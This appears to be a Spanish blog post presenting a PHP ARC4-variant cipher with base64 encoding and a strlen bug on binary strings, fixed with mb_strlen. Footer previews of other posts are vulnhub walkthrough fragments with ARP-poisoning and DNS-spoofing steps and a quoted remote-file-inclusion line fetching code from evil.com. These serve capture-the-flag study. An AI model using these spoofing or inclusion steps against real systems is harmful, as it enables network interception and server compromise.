Cuidado con los bytes ocultos (variante Arc4 y base64)

Aquí una versión PHP de una variante de la encriptación ARC4 (Alleged-Rivest Cipher, parte de los protocolos de cifrado más comunes como WEP, WPA para tarjetas wireless y TLS).

 function varc4($clave,$string)
                {
$x=strlen($clave);

for($h=0;$h<256;$h++)
                      {$b[$h]=$h;}

for($h=0;$h<256;$h++)
{
$f=($f+$b[$h]+ord($clave[$h%$x]))%256;

  //swap

 $i=$b[$h];
$b[$h]=$b[$f];
$b[$f]=$i;
}

$f=$h=0;

 for($q=0;$q<strlen($string);$q++)
{
$h=($h+1)%256;
$f=($f+$b[$h])%256;

//swap

 $i=$b[$h];
$b[$h]=$b[$f];
$b[$f]=$i;

$d.=chr(ord($string[$q])^$b[($b[$h]+$b[$f])%256]);
                        }

return $d;
}

 Supongamos que usamos la clave "becaf9be" y codificamos "348319812478410a334dd_1724"

pasándolo a base64

 base64_encode(varc4("becaf9be","348319812478410a334dd_1724"));

 NAXYTQwXLrrY1ffJ8eJzA4P3vUdp1wzMWhs=

 El algoritmo es el mismo para encriptar y desencriptar, con lo que

varc4("becaf9be",base64_decode("NAXYTQwXLrrY1ffJ8eJzA4P3vUdp1wzMWhs="));

debería dar el valor de partida. Pero da 348319812478410a334

 Problema: el algoritmo puede perder valores de la cadena, y el problema es la manera en que se calcula la longitud de $string cuando son valores binarios.

 strlen(base64_decode("NAXYTQwXLrrY1ffJ8eJzA4P3vUdp1wzMWhs="))=19

 pero la cadena debería ser de 26.

 Solución: aplicar mb_strlen($string, "8bit")

varc4 es utilizado por páginas como Youku


Comentarios

Publicar un comentario

Entradas populares de este blog

Actualizando a LEDE (Openwrt based) el router Afoundry EW-1200

Imagen
Tenemos aquí un router "chino" que en principio llama la atención por las 6 antenas que trae. Por el precio sería un router de gama media-alta. Aquí viene una review. Me quedo con la aparente potencia del procesador  Mediatek  MT7621   de 2 núcleos a 880 Mhz y la capacidad de emitir wifi simultáneamente en las bandas de 2.4 y 5 Ghz. Incorpora además -  128 MB  DDR3 RAM - 128 Mb SPI flash - 1 USB 3.0 Funciona bastante bien, pero la interfaz web es demasiado austera y deja muchos parámetros ocultos que lo harían más potente. En concreto trae instalado el Openwrt Barrier Breaker 14.07 pero modificado. Para manipularlo abrimos la carcasa y conectamos por el puerto serial que trae, en este caso de solo 3 pines Rx,Gnd,Tx. No trae JTAG. Para conectar usamos de nuevo un cable prolific  Plugable USB to RS-232 DB9  y un  Serial Port Converter  JY-R2T V1.2 RS232. Al ser una conexión de solo tres pines sin VCC (alimentació...
Leer más

vulnhub walkthrough MORTAL KOMBAT: 1: ARP poison routing + dns spoofing, ssrf hash-length attack

 https://www.vulnhub.com/entry/mortal-kombat-1,383/ You'll need to master and chain together multiple vulnerabilities 1. Se nos presenta lo siguiente Curl test page admin area  (works only if localhost) test page testpage: http://192.168.2.24/index.php?url=http://google.com Probamos lfi http://192.168.2.24/index.php?url=http://127.0.0.1/adminArea.php you can only render page from google.com domain 2. Tenemos que spoofear la petición dns de la máquina virtual haciéndole creer que "google.com" es 127.0.0.1 para poder acceder a adminArea.php.  en kali usar ettercap - configurar etc/ettercap/etter.dns google.com A 127.0.0.1 - Arrancar y hacer mitm arp poisoning seleccionando target1 la víctima y target2 el router - Activar dns spoofing 3. Accedemos a adminArea.php con Burp <!-- After the PT @Bytevsbyt3 told me that my page was really unsecure. He told me that he pwn the server via RFI with ?file=http://evil.com/rfi.txt I read about this vulnerability and now i fixed it. N...
Leer más

SIXES: 1: Walkthrough Advanced-Hard Boot2Root machine: Cookie stealing + jpg shell + pwn BOF ret2lib NX ASLR

Imagen
  https://www.vulnhub.com/entry/sixes-1,380/ Advanced-Hard Boot2Root machine intended to be used in a Workshop/CTF beside Shellmates Club. Este es el primer walkthrough de esta máquina en internet. Tiene una serie de movimientos con los que se puede aprender mucho ;) 1.  Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 09:50 CET Nmap scan report for sixes.home (192.168.2.28) Host is up (0.016s latency). Not shown: 65531 closed tcp ports (conn-refused) PORT     STATE SERVICE 21/tcp   open  ftp 22/tcp   open  ssh 80/tcp   open  http Accedemos al ftp lftp 192.168.2.28:~> dir -r--r--r--    1 0        0             233 Oct 03  2019 note.txt lftp 192.168.2.28:/> cat note.txt DONE:   - Develop the web application frontend and backend   - Add a firewall to block malicious tools TODO:   - Hire a Pentester to secure the web applicati...
Leer más